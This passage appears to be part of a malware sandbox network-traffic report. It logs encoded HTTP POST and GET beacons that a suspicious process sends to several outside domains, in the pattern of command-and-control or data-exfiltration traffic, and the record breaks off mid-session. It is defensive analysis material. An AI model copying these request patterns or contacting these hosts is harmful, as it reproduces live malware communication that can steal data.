                  Data Ascii: ylT8el=MEaJXMXVJnVQcrIkt0ofn7NlsL+0lYpbSuKziOK+3S6xis1/shMpXjoaqZe+uew0PAvwp8gqQv+paWJTMu8KEQPQIIgzGZU7EO6OC0dYJeL3ddn9Qp2pZJkQc8yysD1XCcFfExPyRLQV2z2Dd2tASlHvEdnJ9BqWakQX6XNxQC6p3bSuuQCCEihw2PXG3ZJGe2vYURamqrquRfaoXRAhRTgN8daZh8hXOGV16iFXhbdXwBjdVA1hItLVGKma6zONQuSh5xvfNYnSrYUpEA+tTFQuXq1FWGGLnqb1k/V01eMWNnxI+EEYv35Odcjwip6ZxzKq4ZvkUWTKeqTlYLwjscQliI0B9ovKhtjtqy4af6npgniTJw/1sda1hWzwHWYTfSMo4K4M+QBSejk6ojXbDtmLaLTFkAzKmRKCajvRlHtvnlEKiaKO/Ark6OhVFSkTO2Kp0HpptaSeNV3U+DLX3NcrncoGy/fa5mwxWbRgCNFvm2kQgf8bRLxPJbDawA1lWOM3NnZ3HtuhBSxwHHX9P6/+HAqHNDiHzXe1pm4b5IBcmCsFRpnttcTRrU2bgCkk5OFhyeyUG+XzQfMwocnIugyKABKcynCThLNZtmRPtgqje/T4pKY0qv/qHBuYCBvunJIqK1VB5pAXwpO5fCQoLNqZOMxVuzWC0S8jzxz/3bla2kv+mWNC/oX7xJH0ittAj9o8vat8S0rkZ3n9u0XgweSb3vIumV9pMRFF8i4FO90kPgAfSC5qb5q2VGqasxqtZXQ7CV0biMPVUoR3f5NlOhJL/WIDcJekGTiHmEjKSxlEyYZeNGKrHAAItuCVNXzDiw7th2ADdubtoXqU7Q0xkIxlO9KicJzLcZD8/tQLjQKZ6hPNXIj2Uj1FvSn+cck3yvH1oi1So/JHRT+xntsqkQpANkHUlr2TxlsY7w62Lo1vbr+M+6jZO+J0crokSOaMdN/pkdhUAdNNic9QhJlEAKWakH5vOLJ3MM7VKFsaEHVHS [TRUNCATED]
                  Jul 3, 2024 10:52:54.739522934 CEST | 572 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/
                  Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/'" /> <title>Redirecting to http://lecoinsa.net/i4bw/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/">http://lecoinsa.net/i4bw/</a>. </body></html>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.11 | 49739 | 217.116.0.191 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:52:56.584433079 CEST | 411 | OUT | GET /i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM= HTTP/1.1
                  Host: www.lecoinsa.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:52:57.292973995 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:52:57 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 934
                  Connection: close
                  Location: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=
                  Age: 0
                  X-Cache: MISS
                  X-BKSrc: 0.6
                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM='" /> <title>Redirecting to http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=">http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8
                  Jul 3, 2024 10:52:57.293029070 CEST | 85 | IN | Data Raw: 2f 4f 46 36 59 48 57 41 6c 71 45 45 52 38 47 6e 54 58 35 64 57 4d 41 68 53 41 37 66 52 2b 59 37 44 35 45 6b 47 72 48 4c 54 32 35 62 41 75 7a 58 66 2b 72 52 4e 75 36 6b 63 4a 4d 3d 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74
                  Data Ascii: /OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM=</a>. </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.11 | 49740 | 165.154.0.120 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:02.553823948 CEST | 666 | OUT | POST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=mEYQ+LBkCt6nCmj8j98AzGzsQ06McGaTgXL8VEQ2qgr6ZUSY+e55JH75OpJM7NsTzIqEDYrQHzoT/16qkB5tAlb6vR38IR65MhVuFQmTmByuFOmhho9cElBmj8zcAtVPWEhoBBBgh4LW0bN0WFdRDMOpsk3+zGMxdaW8uK8HA6UGO9pq2hoi77kK+QTVC0VmVw==
                  Jul 3, 2024 10:53:03.451106071 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:03 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx04</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.11 | 49741 | 165.154.0.120 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:05.088560104 CEST | 686 | OUT | POST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=mEYQ+LBkCt6nCHz8gc8Ai2zjeU6MSmapgX38VG8mqyf6a2aY9f55IH75a5JDmdsYzImyDdLQHz8T/wWqkw5qRlb40h3+MR65MhVuFQD4mBKuG+2hgJ9TNFBhqczcEtVLWEhKBD1Kh7/W0bd0W0dWKMOryU212mVUeozilMx1PLgFP74wmCh14osIq2ylLFwvO3YLWqmbxloqC2V+h5U4OME=
                  Jul 3, 2024 10:53:05.969374895 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:05 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx04</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.11 | 49742 | 165.154.0.120 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:07.618547916 CEST | 1699 | OUT | POST /i74x/ HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.778981.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.778981.com/i74x/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:08.500189066 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:08 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx20</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.11 | 49743 | 165.154.0.120 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:10.147753954 CEST | 409 | OUT | GET /i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:11.018973112 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:10 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 3915
                  Connection: close
                  Last-Modified: Thu, 13 Jun 2024 18:55:23 GMT
                  Vary: Accept-Encoding
                  ETag: "666b409b-f4b"
                  Accept-Ranges: bytes
                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title>诚信安全，超凡体验</title> <base href="/" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="styles.7fe23eeaee19115225d9.css"></head> <body> <app-root></app-root> <script src="https://v-cn.vaptcha.com/v3.js" async defer></script> ... Start of LiveChat (www.livechat.com) code --> <script> if (document.domain.includes('hs246.com') || document.domain.includes('xjc893.com')) { window.__lc = window.__lc || {} window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () {
                  Jul 3, 2024 10:53:11.019012928 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 63 65 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 3a 20 66 75 6e 63
                  Data Ascii: i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(arguments)]) }, get: function () { if (!e._h) throw new Error("[LiveChatWidget] Yo
                  Jul 3, 2024 10:53:11.019160986 CEST | 1236 | IN | Data Raw: 20 20 20 77 69 6e 64 6f 77 2e 5f 5f 6c 63 2e 6c 69 63 65 6e 73 65 20 3d 20 31 34 32 38 32 39 36 31 0a 20 20 20 20 20 20 3b 28 66 75 6e 63 74 69 6f 6e 20 28 6e 2c 20 74 2c 20 63 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 69 28
                  Data Ascii: window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0',
                  Jul 3, 2024 10:53:11.019174099 CEST | 472 | IN | Data Raw: 20 70 6f 77 65 72 65 64 20 62 79 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 3f 77 65 6c 63 6f 6d 65 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c
                  Data Ascii: powered by <a href="https://www.livechat.com/?welcome" rel="noopener nofollow" target="_blank">LiveChat</a> </noscript> ... End of LiveChat code --> <script src="runtime.36869f6f9588d9b243e1.js"></script><script src="polyfill


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.11 | 49744 | 121.37.199.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:16.910839081 CEST | 666 | OUT | POST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=9hjWchEVxNeEas0S6aAWHIrXARCUSXrRDVbpDi8IMGxtPsljusjscZc/Rkc2m+0QVAtiiHJKLtzbRt8eq7yoraJfFMwGtrIcwgKcjHnwm1fwplxAZi8CPRi5fwrD1PnhptVE5/c6HcN/UTRasfVywFAHtIFwNL9ygPh2nVgtzrEVwhUykolHRcUq4x7ZSfUwoA==
                  Jul 3, 2024 10:53:17.866528988 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439477166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=rI3wa6P8mig-JsqP; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:17 GMT; HttpOnly


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.11 | 49745 | 121.37.199.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:19.442528009 CEST | 686 | OUT | POST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=9hjWchEVxNeEIYISqLAWQYrUPxCUEnrVDVXpDgRTZlVtPO9jttjsdZc/JUczoe0LVAhciCJKLpTbRtMerIap56JdNswIjLIcwgKcjHzKm13woVhAYAUNThi4YwrD/vntptVm56EUHfl/UShasuV16FANyYEwcaJ6lfgYikFZ0Io01nFo0LsQSPcosXapbux5zCddjk1WSxBIJmVFyAYdB/k=
                  Jul 3, 2024 10:53:20.555830002 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439662166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=2-p6tn4e7V9He5fR; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:20 GMT; HttpOnly


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.11 | 49746 | 121.37.199.72 | 80 | 1164 | C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:21.974477053 CEST | 1699 | OUT | POST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:22.958832026 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439867166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=QWDiENi4xHZuMd2b; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:22 GMT; HttpOnly


                  Session ID: 28 | Source IP: 192.168.2.11 | Source Port: 49747 | Destination IP: 121.37.199.72 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:24.514997005 CEST | 409 | OUT | GET /fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU= HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:25.491576910 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 3112
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  FAI-W-FLOW: 1440040166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=9tdS-TVUP42VT6Pl; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:25 GMT; HttpOnly
                  Data Ascii: <!DOCTYPE HTML><html><head><meta charset='utf-8'><meta http-equiv='X-UA-Compatible' content='IE=edge' /><meta name='keywords' content='-'/><meta name='description' content='-'/><title>-</title><style type='text/css' media='screen,print'>body{ background:#F9F9F9;margin: 0px;font-family:'',''; font-size:12px;}.box{width: 100%;margin: 0 auto;height: auto}.box .titleContent { width: 100%;border-bottom-color: #e3e3e3;line-height:50px; background-color: #FFF;border-bottom-style: solid;border-bottom-width: 1px;}.box .titleContent .title{width:300px;height:5
                  Jul 3, 2024 10:53:25.491609097 CEST | 1236 | IN
                  Data Ascii: 0px;margin-left:15%;padding-top:20px; padding:2px; font-family:''; font-size:20px;color: #4266b2;}.box .content{width:700px;height:auto;margin:0 auto; border-top-color: #fff;background-color: #f9f9f9;border-top-style: solid;border
                  Jul 3, 2024 10:53:25.491621017 CEST | 1236 | IN
                  Data Ascii: .faisys.com/image/error/err_img_bg.png") no-repeat 0px -230px; margin-top:8px; height:15px;padding-left:17px;;margin-left:10px; display: inline;float: left;}.refresh .refreshTxt{margin-left:6px; display: inline;float: left;margin-top: 6px;}.er
                  Jul 3, 2024 10:53:25.491889000 CEST | 66 | IN
                  Data Ascii: 'errorButton' id='errorBtn'></div></div></div></div></body></html>


                  Session ID: 29 | Source IP: 192.168.2.11 | Source Port: 49748 | Destination IP: 3.33.244.179 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:31.658545971 CEST | 699 | OUT | POST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=UjWoPL/WmJKn12h58f9uabq85qMaM5n+6jB/tcDrg12iB5nkjHbIqZMBnJf8a72MfGJoaT+24RgyhBi39DkXjippE3z7mz4quTfBNVvtDA71N1ya+rUAxYUNwezsHI0AYUb0GciAKw4yuUjInJ6LlINLM7bV2xNNJZTjJ6sIV3Z+j1loYr2I++gcO74ZOykemg==


                  Session ID: 30 | Source IP: 192.168.2.11 | Source Port: 49749 | Destination IP: 3.33.244.179 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:34.194782019 CEST | 719 | OUT | POST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=UjWoPL/WmJKn0Xx564puc7q/6qMaDZn66jd/tYbdhGCiBb/kxSvItZMBspf5Ub2LfGNaaTS24RcyhAS3okQQsSprLXz5oT4quTfBNRHHDAj1NECa+KUDvIUOmOzsDI0cYUbWGZ6qKzAyuUTIgcOKvINJCbbH4U0dSrXjQZIEUTBPiz0yII/f9toeadZpHDBX9vL0YjdGWYnFN4mOdILTnfA=


                  Session ID: 31 | Source IP: 192.168.2.11 | Source Port: 49750 | Destination IP: 3.33.244.179 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:36.740550995 CEST | 1732 | OUT | POST /73ru/ HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.oliviacorepilates.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.oliviacorepilates.com/73ru/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


                  Session ID: 32 | Source IP: 192.168.2.11 | Source Port: 49751 | Destination IP: 3.33.244.179 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
